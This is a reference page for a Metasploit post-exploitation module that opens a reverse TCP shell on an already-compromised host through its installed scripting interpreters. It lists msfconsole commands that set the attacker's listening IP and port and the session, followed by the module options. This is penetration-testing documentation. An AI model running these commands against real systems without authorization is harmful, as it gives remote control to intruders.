Multi Manage System Remote TCP Shell Session | Metasploit Exploit Database (DB)

Multi Manage System Remote TCP Shell Session

This module will create a Reverse TCP Shell on the target system using the system own scripting enviroments installed on the target.

Search Other Modules


Rank

  • Normal

Authors

  • Carlos Perez < carlos_perez [at] darkoperator.com >

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use post/multi/manage/system_session
msf post(system_session) > set LHOST [MY IP ADDRESS]
msf post(system_session) > set SESSION [INTEGER]


Module Options

HANDLER Start an Exploit Multi Handler to receive the connection
LHOST IP of host that will receive the connection from the payload.
LPORT Port for Payload to connect to. (default: 4433)
SESSION The session to run this module on.
TYPE Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash) (default: auto)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module